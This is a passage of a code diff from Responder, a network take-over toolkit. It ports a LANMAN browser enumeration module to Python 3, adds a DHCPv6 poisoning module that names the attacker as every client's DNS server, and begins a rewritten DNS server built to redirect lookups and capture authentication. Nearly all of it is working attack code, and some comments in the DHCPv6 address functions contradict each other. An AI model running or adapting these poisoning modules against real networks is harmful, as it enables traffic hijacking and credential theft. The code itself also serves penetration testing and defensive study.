 def WorkstationFingerPrint(data):
 	return {
-		"\x04\x00"    :"Windows 95",
-		"\x04\x10"    :"Windows 98",
-		"\x04\x90"    :"Windows ME",
-		"\x05\x00"    :"Windows 2000",
-		"\x05\x01"    :"Windows XP",
-		"\x05\x02"    :"Windows XP(64-Bit)/Windows 2003",
-		"\x06\x00"    :"Windows Vista/Server 2008",
-		"\x06\x01"    :"Windows 7/Server 2008R2",
-		"\x06\x02"    :"Windows 8/Server 2012",
-		"\x06\x03"    :"Windows 8.1/Server 2012R2",
-		"\x10\x00"    :"Windows 10/Server 2016",
-	}.get(data, 'Unknown')
+ 		b"\x04\x00"    :"Windows 95",
+		b"\x04\x0A"    :"Windows 98",
+		b"\x04\x5A"    :"Windows ME",
+ 		b"\x05\x00"    :"Windows 2000",
+ 		b"\x05\x01"    :"Windows XP",
+ 		b"\x05\x02"    :"Windows XP(64-Bit)/Windows 2003",
+ 		b"\x06\x00"    :"Windows Vista/Server 2008",
+ 		b"\x06\x01"    :"Windows 7/Server 2008R2",
+ 		b"\x06\x02"    :"Windows 8/Server 2012",
+ 		b"\x06\x03"    :"Windows 8.1/Server 2012R2",
+		b"\x0A\x00"    :"Windows 10/Server 2016",
+ 	}.get(data, 'Unknown')
 
 
 def RequestType(data):
 	return {
-		"\x01": 'Host Announcement',
-		"\x02": 'Request Announcement',
-		"\x08": 'Browser Election',
-		"\x09": 'Get Backup List Request',
-		"\x0a": 'Get Backup List Response',
-		"\x0b": 'Become Backup Browser',
-		"\x0c": 'Domain/Workgroup Announcement',
-		"\x0d": 'Master Announcement',
-		"\x0e": 'Reset Browser State Announcement',
-		"\x0f": 'Local Master Announcement',
+		b"\x01": 'Host Announcement',
+		b"\x02": 'Request Announcement',
+		b"\x08": 'Browser Election',
+		b"\x09": 'Get Backup List Request',
+		b"\x0a": 'Get Backup List Response',
+		b"\x0b": 'Become Backup Browser',
+		b"\x0c": 'Domain/Workgroup Announcement',
+		b"\x0d": 'Master Announcement',
+		b"\x0e": 'Reset Browser State Announcement',
+		b"\x0f": 'Local Master Announcement',
 	}.get(data, 'Unknown')
 
 
@@ -55,13 +58,13 @@ def PrintServerName(data, entries):
 	if entries <= 0:
 		return None
 	entrieslen = 26 * entries
-	chunks, chunk_size = len(data[:entrieslen]), entrieslen/entries
+	chunks, chunk_size = len(data[:entrieslen]), entrieslen//entries
 	ServerName = [data[i:i+chunk_size] for i in range(0, chunks, chunk_size)]
 
 	l = []
 	for x in ServerName:
 		fingerprint = WorkstationFingerPrint(x[16:18])
-		name = x[:16].replace('\x00', '')
+		name = x[:16].strip(b'\x00').decode('latin-1')
 		l.append('%s (%s)' % (name, fingerprint))
 	return l
 
@@ -70,24 +73,24 @@ def ParsePacket(Payload):
 	PayloadOffset = struct.unpack('<H',Payload[51:53])[0]
 	StatusCode = Payload[PayloadOffset-4:PayloadOffset-2]
 
-	if StatusCode == "\x00\x00":
+	if StatusCode == b'\x00\x00':
 		EntriesNum = struct.unpack('<H',Payload[PayloadOffset:PayloadOffset+2])[0]
 		return PrintServerName(Payload[PayloadOffset+4:], EntriesNum)
-	return None
+	return ''
 
 
 def RAPThisDomain(Client,Domain):		
 	PDC = RapFinger(Client,Domain,"\x00\x00\x00\x80")
 	if PDC is not None:
-		print text("[LANMAN] Detected Domains: %s" % ', '.join(PDC))
+		print(text("[LANMAN] Detected Domains: %s" % ', '.join(PDC)))
 	
 	SQL = RapFinger(Client,Domain,"\x04\x00\x00\x00")
 	if SQL is not None:
-		print text("[LANMAN] Detected SQL Servers on domain %s: %s" % (Domain, ', '.join(SQL)))
+		print(text("[LANMAN] Detected SQL Servers on domain %s: %s" % (Domain, ', '.join(SQL))))
 
 	WKST = RapFinger(Client,Domain,"\xff\xff\xff\xff")
 	if WKST is not None:
-		print text("[LANMAN] Detected Workstations/Servers on domain %s: %s" % (Domain, ', '.join(WKST)))
+		print(text("[LANMAN] Detected Workstations/Servers on domain %s: %s" % (Domain, ', '.join(WKST))))
 
 
 def RapFinger(Host, Domain, Type):
@@ -101,49 +104,49 @@ def RapFinger(Host, Domain, Type):
 		Body.calculate()
 
 		Packet = str(Header)+str(Body)
-		Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
+		Buffer = StructPython2or3('>i', str(Packet))+str(Packet)#struct.pack(">i", len(''.join(Packet))) + Packet
 
-		s.send(Buffer)
+		s.send(NetworkSendBufferPython2or3(Buffer))
 		data = s.recv(1024)
 
 		# Session Setup AndX Request, Anonymous.
-		if data[8:10] == "\x72\x00":
+		if data[8:10] == b'\x72\x00':
 			Header = SMBHeader(cmd="\x73",mid="\x02\x00")
 			Body = SMBSessionData()
 			Body.calculate()
 
 			Packet = str(Header)+str(Body)
-			Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
+			Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
 
-			s.send(Buffer)
+			s.send(NetworkSendBufferPython2or3(Buffer))
 			data = s.recv(1024)
 
 			# Tree Connect IPC$.
-			if data[8:10] == "\x73\x00":
-				Header = SMBHeader(cmd="\x75",flag1="\x08", flag2="\x01\x00",uid=data[32:34],mid="\x03\x00")
+			if data[8:10] == b'\x73\x00':
+				Header = SMBHeader(cmd="\x75",flag1="\x08", flag2="\x01\x00",uid=data[32:34].decode('latin-1'),mid="\x03\x00")
 				Body = SMBTreeConnectData(Path="\\\\"+Host+"\\IPC$")
 				Body.calculate()
 
 				Packet = str(Header)+str(Body)
-				Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
+				Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
 
-				s.send(Buffer)
+				s.send(NetworkSendBufferPython2or3(Buffer))
 				data = s.recv(1024)
 
 				# Rap ServerEnum.
-				if data[8:10] == "\x75\x00":
-					Header = SMBHeader(cmd="\x25",flag1="\x08", flag2="\x01\xc8",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x04\x00")
+				if data[8:10] == b'\x75\x00':
+					Header = SMBHeader(cmd="\x25",flag1="\x08", flag2="\x01\xc8",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x04\x00")
 					Body = SMBTransRAPData(Data=RAPNetServerEnum3Data(ServerType=Type,DetailLevel="\x01\x00",TargetDomain=Domain))
 					Body.calculate()
 
 					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
+					Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
 
-					s.send(Buffer)
+					s.send(NetworkSendBufferPython2or3(Buffer))
 					data = s.recv(64736)
 
 					# Rap ServerEnum, Get answer and return what we're looking for.
-					if data[8:10] == "\x25\x00":
+					if data[8:10] == b'\x25\x00':
 						s.close()
 						return ParsePacket(data)
 	except:
@@ -162,8 +165,10 @@ def BecomeBackup(data,Client):
 			Role       = NBT_NS_Role(data[45:48])
 
 			if settings.Config.AnalyzeMode:
-				print text("[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client, Name,Role,Domain))
-				print RAPThisDomain(Client, Domain)
+				print(text("[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client.replace("::ffff:",""), Name,Role,Domain)))
+				RAPInfo = RAPThisDomain(Client, Domain)
+				if RAPInfo is not None:
+					print(RAPInfo)
 
 	except:
 		pass
@@ -177,8 +182,10 @@ def ParseDatagramNBTNames(data,Client):
 
 	
 		if Role2 == "Domain Controller" or Role2 == "Browser Election" or Role2 == "Local Master Browser" and settings.Config.AnalyzeMode:
-			print text('[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s' % (Client, Name, Role1, Domain, Role2))
-			print RAPThisDomain(Client, Domain)
+			print(text('[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s' % (Client.replace("::ffff:",""), Name, Role1, Domain, Role2)))
+			RAPInfo = RAPThisDomain(Client, Domain)
+			if RAPInfo is not None:
+				print(RAPInfo)
 	except:
 		pass
 
@@ -189,7 +196,7 @@ class Browser(BaseRequestHandler):
 			request, socket = self.request
 
 			if settings.Config.AnalyzeMode:
-				ParseDatagramNBTNames(request,self.client_address[0])
+				ParseDatagramNBTNames(NetworkRecvBufferPython2or3(request),self.client_address[0])
 				BecomeBackup(request,self.client_address[0])
 			BecomeBackup(request,self.client_address[0])
 

servers/DHCPv6.py

@@ -0,0 +1,471 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# DHCPv6 poisoning module based on mitm6 concepts by Dirk-jan Mollema
+# email: lgaffie@secorizon.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+from utils import *
+import struct
+import socket
+import time
+
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
+# DHCPv6 Message Types
+DHCPV6_SOLICIT = 1
+DHCPV6_ADVERTISE = 2
+DHCPV6_REQUEST = 3
+DHCPV6_CONFIRM = 4
+DHCPV6_RENEW = 5
+DHCPV6_REBIND = 6
+DHCPV6_REPLY = 7
+DHCPV6_RELEASE = 8
+DHCPV6_DECLINE = 9
+DHCPV6_INFORMATION_REQUEST = 11
+
+# DHCPv6 Option Codes
+OPTION_CLIENTID = 1
+OPTION_SERVERID = 2
+OPTION_IA_NA = 3
+OPTION_IA_TA = 4
+OPTION_IAADDR = 5
+OPTION_ORO = 6
+OPTION_PREFERENCE = 7
+OPTION_ELAPSED_TIME = 8
+OPTION_RELAY_MSG = 9
+OPTION_AUTH = 11
+OPTION_UNICAST = 12
+OPTION_STATUS_CODE = 13
+OPTION_RAPID_COMMIT = 14
+OPTION_USER_CLASS = 15
+OPTION_VENDOR_CLASS = 16
+OPTION_VENDOR_OPTS = 17
+OPTION_INTERFACE_ID = 18
+OPTION_RECONF_MSG = 19
+OPTION_RECONF_ACCEPT = 20
+OPTION_DNS_SERVERS = 23
+OPTION_DOMAIN_LIST = 24
+
+class DHCPv6State:
+	def __init__(self):
+		self.leases = {}
+		self.start_time = time.time()
+		self.poisoned_count = 0
+		
+	def add_lease(self, client_id, ipv6_addr, mac):
+		self.leases[client_id] = {
+			'ipv6': ipv6_addr,
+			'mac': mac,
+			'lease_time': time.time(),
+			'lease_duration': 120
+		}
+		self.poisoned_count += 1
+
+dhcpv6_state = DHCPv6State()
+
+class DHCPv6(BaseRequestHandler):
+	
+	def handle(self):
+		try:
+			data, socket_obj = self.request
+			
+			if len(data) < 4:
+				return
+			
+			msg_type = data[0]
+			transaction_id = data[1:4]
+			
+			if msg_type not in [DHCPV6_SOLICIT, DHCPV6_REQUEST, DHCPV6_CONFIRM, DHCPV6_RENEW, DHCPV6_REBIND, DHCPV6_INFORMATION_REQUEST]:
+				return
+			
+			options = self.parse_dhcpv6_options(data[4:])
+			
+			client_id = options.get(OPTION_CLIENTID)
+			if not client_id:
+				return
+			
+			client_mac = self.extract_mac_from_clientid(client_id)
+			
+			if not self.should_poison_client():
+				return
+			
+			msg_type_name = self.get_message_type_name(msg_type)
+			
+			if settings.Config.Verbose:
+				print(text('[DHCPv6] %s from %s (MAC: %s)' % (
+					msg_type_name,
+					self.client_address[0],
+					client_mac if client_mac else 'Unknown'
+				)))
+			
+			# Build response based on message type
+			if msg_type == DHCPV6_SOLICIT:
+				response = self.build_advertise(transaction_id, options)
+				response_type = 'ADVERTISE'
+			elif msg_type == DHCPV6_REQUEST:
+				response = self.build_reply(transaction_id, options, client_id, client_mac)
+				response_type = 'REPLY'
+			elif msg_type == DHCPV6_RENEW:
+				response = self.build_reply(transaction_id, options, client_id, client_mac)
+				response_type = 'REPLY (Renew)'
+			elif msg_type == DHCPV6_REBIND:
+				response = self.build_reply(transaction_id, options, client_id, client_mac)
+				response_type = 'REPLY (Rebind)'
+			elif msg_type == DHCPV6_CONFIRM:
+				response = self.build_confirm_reply(transaction_id, options)
+				response_type = 'REPLY (Confirm)'
+			elif msg_type == DHCPV6_INFORMATION_REQUEST:
+				response = self.build_info_reply(transaction_id, options)
+				response_type = 'REPLY (Info)'
+			else:
+				return
+			
+			socket_obj.sendto(response, self.client_address)
+			
+			analyze_mode = getattr(settings.Config, 'Analyze', False)
+			
+			if analyze_mode:
+				print(color('[Analyze] [DHCPv6] Would send %s to %s' % (response_type, self.client_address[0]), 3, 1))
+			else:
+				attacker_ip = self.get_attacker_ipv6()
+				print(text('[DHCPv6] Sent %s to %s' % (response_type, self.client_address[0])))
+				if msg_type in [DHCPV6_REQUEST, DHCPV6_RENEW, DHCPV6_REBIND, DHCPV6_SOLICIT]:
+					print(text('[DHCPv6] Poisoned DNS server: %s' % attacker_ip))
+		
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(color('[!] [DHCPv6] Error: %s' % str(e), 1, 1))
+				import traceback
+				traceback.print_exc()
+	
+	def should_poison_client(self):
+		return True
+	
+	def parse_dhcpv6_options(self, options_data):
+		options = {}
+		offset = 0
+		
+		while offset < len(options_data) - 4:
+			option_code = struct.unpack('!H', options_data[offset:offset+2])[0]
+			option_len = struct.unpack('!H', options_data[offset+2:offset+4])[0]
+			option_data = options_data[offset+4:offset+4+option_len]
+			
+			options[option_code] = option_data
+			offset += 4 + option_len
+		
+		return options
+	
+	def extract_mac_from_clientid(self, client_id):
+		try:
+			if len(client_id) < 2:
+				return None
+			
+			duid_type = struct.unpack('!H', client_id[0:2])[0]
+			
+			if duid_type == 1 and len(client_id) >= 14:
+				mac = client_id[8:14]
+				return ':'.join(['%02x' % b for b in bytearray(mac)])
+			elif duid_type == 3 and len(client_id) >= 8:
+				mac = client_id[4:10]
+				return ':'.join(['%02x' % b for b in bytearray(mac)])
+		except:
+			pass
+		
+		return None
+	
+	def get_attacker_ipv6(self):
+		"""Get attacker's link-local IPv6 address derived from IPv4"""
+		# mitm6 technique: use link-local address with decimal octets
+		# Example: 10.207.212.254 -> fe80::a:cf:d4:fe (hex) or similar pattern
+		# Actually based on your example, it seems to generate a different link-local
+		# Let's use the actual Bind_To6 if available, otherwise construct one
+		try:
+			# Try to get actual link-local from interface
+			import netifaces
+			iface = settings.Config.Interface
+			addrs = netifaces.ifaddresses(iface)
+			if netifaces.AF_INET6 in addrs:
+				for addr_info in addrs[netifaces.AF_INET6]:
+					addr = addr_info.get('addr', '').split('%')[0]
+					# Return link-local address (fe80::)
+					if addr.startswith('fe80::'):
+						return addr
+		except:
+			pass
+		
+		# Fallback: construct from IPv4
+		try:
+			ipv4 = settings.Config.Bind_To
+			octets = ipv4.split('.')
+			# Use hex conversion for DNS server address
+			ipv6 = 'fe80::%x:%x:%x:%x' % (
+				int(octets[0]), int(octets[1]),
+				int(octets[2]), int(octets[3])
+			)
+			return ipv6
+		except:
+			return 'fe80::1'
+	
+	def generate_client_ipv6(self):
+		"""Generate client's link-local IPv6 address from attacker's IPv4"""
+		# mitm6 technique: fe80::<octet1>:<octet2>:<octet3>:254
+		# Example: 10.207.212.254 -> fe80::10:207:212:254
+		try:
+			ipv4 = settings.Config.Bind_To
+			octets = ipv4.split('.')
+			# Use decimal octets (base 10) separated by colons, last octet is always 254
+			ipv6 = 'fe80::%s:%s:%s:254' % (octets[0], octets[1], octets[2])
+			return ipv6
+		except:
+			return 'fe80::1:2:3:4'
+	
+	def build_advertise(self, transaction_id, options):
+		msg = bytes([DHCPV6_ADVERTISE]) + transaction_id
+		
+		# Client ID first
+		if OPTION_CLIENTID in options:
+			msg += self.build_option(OPTION_CLIENTID, options[OPTION_CLIENTID])
+		
+		# Server ID - DUID Type 3 (link-layer only, not link-layer + time)
+		msg += self.build_option(OPTION_SERVERID, self.get_server_duid())
+		
+		# DNS servers option - use link-local address
+		dns_option = self.build_dns_servers_option()
+		msg += self.build_option(OPTION_DNS_SERVERS, dns_option)
+		
+		# IA_NA if requested
+		if OPTION_IA_NA in options:
+			ia_na_option = self.build_ia_na_option(options[OPTION_IA_NA])
+			msg += self.build_option(OPTION_IA_NA, ia_na_option)
+		
+		# Add domain list if configured
+		dhcpv6_domain = getattr(settings.Config, 'DHCPv6_Domain', '')
+		if dhcpv6_domain:
+			domain_option = self.build_domain_list_option([dhcpv6_domain])
+			msg += self.build_option(OPTION_DOMAIN_LIST, domain_option)
+		
+		return msg
+	
+	def build_reply(self, transaction_id, options, client_id, client_mac):
+		msg = bytes([DHCPV6_REPLY]) + transaction_id
+		
+		# Client ID first
+		msg += self.build_option(OPTION_CLIENTID, options[OPTION_CLIENTID])
+		
+		# Server ID - DUID Type 3
+		msg += self.build_option(OPTION_SERVERID, self.get_server_duid())
+		
+		# DNS servers option - use link-local address
+		dns_option = self.build_dns_servers_option()
+		msg += self.build_option(OPTION_DNS_SERVERS, dns_option)
+		
+		# IA_NA if requested - reuse the address from request if present
+		if OPTION_IA_NA in options:
+			ia_na_option = self.build_ia_na_option_reply(options[OPTION_IA_NA])
+			msg += self.build_option(OPTION_IA_NA, ia_na_option)
+		
+		# Add domain list if configured
+		dhcpv6_domain = getattr(settings.Config, 'DHCPv6_Domain', '')
+		if dhcpv6_domain:
+			domain_option = self.build_domain_list_option([dhcpv6_domain])
+			msg += self.build_option(OPTION_DOMAIN_LIST, domain_option)
+		
+		# Track this lease
+		ipv6_addr = self.generate_client_ipv6()
+		dhcpv6_state.add_lease(client_id, ipv6_addr, client_mac)
+		
+		return msg
+	
+	def build_info_reply(self, transaction_id, options):
+		msg = bytes([DHCPV6_REPLY]) + transaction_id
+		
+		# Client ID first
+		if OPTION_CLIENTID in options:
+			msg += self.build_option(OPTION_CLIENTID, options[OPTION_CLIENTID])
+		
+		# Server ID
+		msg += self.build_option(OPTION_SERVERID, self.get_server_duid())
+		
+		# DNS servers option
+		dns_option = self.build_dns_servers_option()
+		msg += self.build_option(OPTION_DNS_SERVERS, dns_option)
+		
+		# Add domain list if configured
+		dhcpv6_domain = getattr(settings.Config, 'DHCPv6_Domain', '')
+		if dhcpv6_domain:
+			domain_option = self.build_domain_list_option([dhcpv6_domain])
+			msg += self.build_option(OPTION_DOMAIN_LIST, domain_option)
+		
+		return msg
+	
+	def build_confirm_reply(self, transaction_id, options):
+		msg = bytes([DHCPV6_REPLY]) + transaction_id
+		
+		# Client ID first
+		msg += self.build_option(OPTION_CLIENTID, options[OPTION_CLIENTID])
+		
+		# Server ID
+		msg += self.build_option(OPTION_SERVERID, self.get_server_duid())
+		
+		# Status Code: Success (0)
+		status_code = struct.pack('!H', 0)
+		msg += self.build_option(OPTION_STATUS_CODE, status_code)
+		
+		# DNS servers option
+		dns_option = self.build_dns_servers_option()
+		msg += self.build_option(OPTION_DNS_SERVERS, dns_option)
+		
+		# Add domain list if configured
+		dhcpv6_domain = getattr(settings.Config, 'DHCPv6_Domain', '')
+		if dhcpv6_domain:
+			domain_option = self.build_domain_list_option([dhcpv6_domain])
+			msg += self.build_option(OPTION_DOMAIN_LIST, domain_option)
+		
+		return msg
+	
+	def build_option(self, code, data):
+		return struct.pack('!HH', code, len(data)) + data
+	
+	def get_server_duid(self):
+		"""Get server DUID - Type 3 (link-layer only) like mitm6"""
+		duid_type = 3  # DUID-LL (link-layer only)
+		hw_type = 1     # Ethernet
+		
+		# Get actual MAC address from interface
+		try:
+			import netifaces
+			iface = settings.Config.Interface
+			addrs = netifaces.ifaddresses(iface)
+			if netifaces.AF_LINK in addrs:
+				mac_str = addrs[netifaces.AF_LINK][0]['addr']
+				# Convert MAC string to bytes
+				mac = bytes([int(x, 16) for x in mac_str.split(':')])
+			else:
+				mac = bytes([0x02, 0x00, 0x00, 0x00, 0x00, 0x01])
+		except:
+			mac = bytes([0x02, 0x00, 0x00, 0x00, 0x00, 0x01])
+		
+		# DUID Type 3 format: type (2) + hardware type (2) + link-layer address
+		duid = struct.pack('!HH', duid_type, hw_type) + mac
+		return duid
+	
+	def build_ia_na_option(self, request_ia_na):
+		"""Build IA_NA option with link-local address for ADVERTISE"""
+		iaid = request_ia_na[0:4]
+		
+		# Short lease times like mitm6
+		t1 = 200
+		t2 = 250
+		
+		ia_na = iaid + struct.pack('!II', t1, t2)
+		
+		# Add IAADDR sub-option with link-local address
+		ipv6_addr = self.generate_client_ipv6()
+		iaaddr = self.build_iaaddr_option(ipv6_addr, 300)
+		ia_na += iaaddr
+		
+		return ia_na
+	
+	def build_ia_na_option_reply(self, request_ia_na):
+		"""Build IA_NA option for REPLY/RENEW/REBIND - reuse client's address if present"""
+		iaid = request_ia_na[0:4]
+		
+		# Short lease times like mitm6
+		t1 = 200
+		t2 = 250
+		
+		ia_na = iaid + struct.pack('!II', t1, t2)
+		
+		# Try to extract existing address from request
+		ipv6_addr = None
+		try:
+			# Parse IA_NA options to find IAADDR
+			offset = 12  # Skip IAID + T1 + T2
+			while offset < len(request_ia_na) - 4:
+				opt_code = struct.unpack('!H', request_ia_na[offset:offset+2])[0]
+				opt_len = struct.unpack('!H', request_ia_na[offset+2:offset+4])[0]
+				
+				if opt_code == OPTION_IAADDR and opt_len >= 16:
+					# Extract IPv6 address (first 16 bytes of option data)
+					import ipaddress
+					addr_bytes = request_ia_na[offset+4:offset+20]
+					ipv6_addr = str(ipaddress.IPv6Address(addr_bytes))
+					break
+				
+				offset += 4 + opt_len
+		except:
+			pass
+		
+		# If no address found in request, generate new one
+		if not ipv6_addr:
+			ipv6_addr = self.generate_client_ipv6()
+		
+		# Add IAADDR sub-option
+		iaaddr = self.build_iaaddr_option(ipv6_addr, 300)
+		ia_na += iaaddr
+		
+		return ia_na
+	
+	def build_iaaddr_option(self, ipv6_addr, lease_time):
+		"""Build IAADDR option"""
+		import ipaddress
+		addr_bytes = ipaddress.IPv6Address(ipv6_addr).packed
+		
+		# Format: IPv6 address (16) + preferred-lifetime (4) + valid-lifetime (4)
+		iaaddr_data = addr_bytes + struct.pack('!II', lease_time, lease_time)
+		
+		# Wrap in option
+		return struct.pack('!HH', OPTION_IAADDR, len(iaaddr_data)) + iaaddr_data
+	
+	def build_dns_servers_option(self):
+		"""Build DNS Servers option - use link-local address like mitm6"""
+		import ipaddress
+		attacker_ipv6 = self.get_attacker_ipv6()
+		dns_bytes = ipaddress.IPv6Address(attacker_ipv6).packed
+		return dns_bytes
+	
+	def build_domain_list_option(self, domains):
+		domain_data = b''
+		for domain in domains:
+			labels = domain.split('.')
+			for label in labels:
+				domain_data += bytes([len(label)]) + label.encode('ascii')
+			domain_data += b'\x00'
+		return domain_data
+	
+	def get_message_type_name(self, msg_type):
+		types = {
+			DHCPV6_SOLICIT: 'SOLICIT',
+			DHCPV6_ADVERTISE: 'ADVERTISE',
+			DHCPV6_REQUEST: 'REQUEST',
+			DHCPV6_CONFIRM: 'CONFIRM',
+			DHCPV6_RENEW: 'RENEW',
+			DHCPV6_REBIND: 'REBIND',
+			DHCPV6_REPLY: 'REPLY',
+			DHCPV6_RELEASE: 'RELEASE',
+			DHCPV6_DECLINE: 'DECLINE',
+			DHCPV6_INFORMATION_REQUEST: 'INFORMATION_REQUEST'
+		}
+		return types.get(msg_type, 'UNKNOWN(%d)' % msg_type)
+
+def print_dhcpv6_stats():
+	if dhcpv6_state.poisoned_count > 0:
+		runtime = int(time.time() - dhcpv6_state.start_time)
+		print(color('\n[DHCPv6] Statistics:', 2, 1))
+		print(color('  Clients poisoned: %d' % dhcpv6_state.poisoned_count, 2, 1))
+		print(color('  Active leases: %d' % len(dhcpv6_state.leases), 2, 1))
+		print(color('  Runtime: %d seconds' % runtime, 2, 1))

servers/DNS.py

@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 # This file is part of Responder, a network take-over set of tools 
 # created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
+# email: lgaffie@secorizon.com
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
 # the Free Software Foundation, either version 3 of the License, or
@@ -14,55 +14,747 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from packets import DNS_Ans
-from SocketServer import BaseRequestHandler
+#
+# Features:
+# - Responds to A, AAAA, SOA, MX, TXT, SRV, and ANY queries
+# - OPT record (EDNS0) support for modern DNS clients
+# - SOA records to appear as authoritative DNS server
+# - MX record poisoning for email client authentication capture
+# - SRV record poisoning for service discovery (Kerberos, LDAP, etc.)
+# - Logs interesting authentication-related domains
+# - 5 minute TTL for efficient caching
+# - Proper IPv6 support (uses -6 option, auto-detects, or skips AAAA)
+# - Domain filtering to target specific domains only
+#
 from utils import *
+import struct
+import socket
 
-def ParseDNSType(data):
-	QueryTypeClass = data[len(data)-4:]
-
-	# If Type A, Class IN, then answer.
-	return QueryTypeClass == "\x00\x01\x00\x01"
-
-
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
 
 class DNS(BaseRequestHandler):
+	"""
+	Enhanced DNS server for Responder
+	Redirects DNS queries to attacker's IP to force authentication attempts
+	"""
+	
 	def handle(self):
-		# Break out if we don't want to respond to this host
-		if RespondToThisIP(self.client_address[0]) is not True:
-			return None
-
 		try:
-			data, soc = self.request
-
-			if ParseDNSType(data) and settings.Config.AnalyzeMode == False:
-				buff = DNS_Ans()
-				buff.calculate(data)
-				soc.sendto(str(buff), self.client_address)
-
-				ResolveName = re.sub(r'[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
-				print color("[*] [DNS] Poisoned answer sent to: %-15s  Requested name: %s" % (self.client_address[0], ResolveName), 2, 1)
-
-		except Exception:
-			pass
-
-# DNS Server TCP Class
-class DNSTCP(BaseRequestHandler):
-	def handle(self):
-		# Break out if we don't want to respond to this host
-		if RespondToThisIP(self.client_address[0]) is not True:
+			data, socket_obj = self.request
+			
+			if len(data) < 12:
+				return
+			
+			# Parse DNS header
+			transaction_id = data[0:2]
+			flags = struct.unpack('>H', data[2:4])[0]
+			questions = struct.unpack('>H', data[4:6])[0]
+			answer_rrs = struct.unpack('>H', data[6:8])[0]
+			authority_rrs = struct.unpack('>H', data[8:10])[0]
+			additional_rrs = struct.unpack('>H', data[10:12])[0]
+			
+			# Check if it's a query (QR bit = 0)
+			if flags & 0x8000:
+				return  # It's a response, ignore
+			
+			# Parse question section
+			query_name, query_type, query_class, offset = self.parse_question(data, 12)
+			
+			if not query_name:
+				return
+			
+			# Check for OPT record in additional section
+			opt_record = None
+			if additional_rrs > 0:
+				opt_record = self.parse_opt_record(data, offset)
+			
+			# Log the query
+			if settings.Config.Verbose:
+				query_type_name = self.get_type_name(query_type)
+				opt_info = ''
+				if opt_record:
+					opt_info = ' [EDNS0: UDP=%d, DO=%s]' % (
+						opt_record['udp_size'],
+						'Yes' if opt_record['dnssec_ok'] else 'No'
+					)
+				print(text('[DNS] Query from %s: %s (%s)%s' % (
+					self.client_address[0].replace('::ffff:', ''),
+					query_name,
+					query_type_name,
+					opt_info
+				)))
+			
+			# Check if we should respond to this query
+			if not self.should_respond(query_name, query_type):
+				return
+			
+			# Build response
+			response = self.build_response(
+				transaction_id,
+				query_name,
+				query_type,
+				query_class,
+				data,
+				opt_record
+			)
+			
+			if response:
+				socket_obj.sendto(response, self.client_address)
+				
+				target_ip = self.get_target_ip(query_type)
+				if target_ip:
+					print(color('[DNS] Poisoned response: %s -> %s' % (
+						query_name, target_ip), 2, 1))
+		
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[DNS] Error: %s' % str(e)))
+	
+	def parse_question(self, data, offset):
+		"""Parse DNS question section and return domain name, type, class"""
+		try:
+			# Parse domain name (labels)
+			labels = []
+			original_offset = offset
+			
+			while offset < len(data):
+				length = data[offset]
+				
+				if length == 0:
+					offset += 1
+					break
+				
+				# Check for compression pointer
+				if (length & 0xC0) == 0xC0:
+					# Compression pointer, stop here
+					offset += 2
+					break
+				
+				offset += 1
+				if offset + length > len(data):
+					return None, None, None, offset
+				
+				label = data[offset:offset+length].decode('utf-8', errors='ignore')
+				labels.append(label)
+				offset += length
+			
+			domain_name = '.'.join(labels)
+			
+			# Parse type and class
+			if offset + 4 > len(data):
+				return None, None, None, offset
+			
+			query_type = struct.unpack('>H', data[offset:offset+2])[0]
+			query_class = struct.unpack('>H', data[offset+2:offset+4])[0]
+			offset += 4
+			
+			return domain_name, query_type, query_class, offset
+		
+		except:
+			return None, None, None, offset
+	
+	def parse_opt_record(self, data, offset):
+		"""
+		Parse OPT pseudo-RR from additional section (EDNS0)
+		
+		OPT RR format:
+		- NAME: domain name (should be root: 0x00)
+		- TYPE: OPT (41)
+		- CLASS: requestor's UDP payload size
+		- TTL: extended RCODE and flags (4 bytes)
+		  - Byte 0: Extended RCODE
+		  - Byte 1: EDNS version
+		  - Bytes 2-3: Flags (bit 15 = DNSSEC OK)
+		- RDLENGTH: length of RDATA
+		- RDATA: {attribute, value} pairs
+		"""
+		try:
+			# Skip any answer/authority records to get to additional section
+			# For simplicity, we'll scan for OPT record (TYPE=41)
+			
+			while offset < len(data):
+				# Check if we're at a name
+				if offset >= len(data):
+					return None
+				
+				# Skip name (could be label or pointer)
+				name_start = offset
+				while offset < len(data):
+					length = data[offset]
+					if length == 0:
+						offset += 1
+						break
+					if (length & 0xC0) == 0xC0:
+						offset += 2
+						break
+					offset += length + 1
+				
+				# Check if we have enough data for type, class, ttl, rdlength
